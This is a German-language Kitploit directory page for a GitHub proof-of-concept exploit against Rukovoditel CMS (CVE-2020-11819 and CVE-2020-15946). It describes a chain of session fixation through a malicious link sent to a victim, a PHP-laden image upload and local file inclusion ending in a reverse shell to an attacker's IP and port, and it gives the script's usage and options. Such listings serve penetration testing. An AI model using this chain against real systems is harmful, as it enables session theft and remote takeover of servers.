Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
PoC-RCE-Rukovoditel — Proof of Concept für CVE-2020-11819 und CVE-2020-15946 | Kitploit
Tools/GitHubGitHub/danyx07/poc-rce-rukovoditel
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubdanyx07/poc-rce-rukovoditel

PoC-RCE-Rukovoditel

Proof of Concept für CVE-2020-11819 und CVE-2020-15946

Repository anzeigen
vor 5 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

PoC-RCE-Rukovoditel

Proof of Concept für CVE-2020-11819 und CVE-2020-15946. Getestet auf Rukovoditel 2.4.x, 2.5.x und 2.6.1

Beschreibung:

Dieser Exploit hat zwei Ausführungsmodi: entweder über die Session-Fixation-Schwachstelle (CVE-2020-15946) oder über die Zugangsdaten eines beliebigen Kontos in einem beliebigen Profil.
Mit der Option --type L erstellt dieses Skript einen bösartigen Link. Wenn das Opfer den Link in einem Browser aufruft, wird eine beliebige Session-ID gesetzt, mit der die Session gestohlen wird, nachdem ein Bild mit PHP-Inhalt auf das Profilfoto hochgeladen wurde. Anschließend wird Local File Inclusion (CVE-2020-11819) verwendet, um eine bequeme Reverse Shell zu erhalten. Alternativ können Sie mit den Optionen --type C -u -p Zugangsdaten angeben, das Bild mit PHP-Inhalt hochladen und Local File Inclusion (CVE-2020-11819) nutzen, um die Codeausführung zu erreichen.

Profi-Tipp: Denken Sie daran zu prüfen, ob das Registrierungsmodul aktiviert ist ;)

Verwendung

exploit.py -t -a L --ip attacker IP --port attacker port [options] exploit.py -t -a C -u -p --ip attacker IP --port attacker port [options]

RCE nach der Authentifizierung für Rukovoditel, Skriptversion 1.0

optionale Argumente:
-h, --help zeigt diese Hilfemeldung an und beendet das Programm
-t URL, --target URL URL/vollständiger Pfad zum CMS Rukovoditel http://url/path/to/cms/
-u USER, --user USER Benutzername für die Authentifizierung
-p PASSWORD, --password PASSWORD Passwort für die Authentifizierung
-a TYPE, --type TYPE Verwenden Sie -a L, um den Link zu erzeugen und die Session zu stehlen, oder -a C, wenn Sie Zugangsdaten für die Webanwendung besitzen
--ip IP_ATTACKER IP-Adresse des Angreifers für die Reverse Shell!
--port PORT_ATTACKER Port für die Reverse-Shell-Verbindung --proxy PROXY HTTP-Proxy für das Debugging einrichten


http://127.0.0.1:8080
Tool herunterladen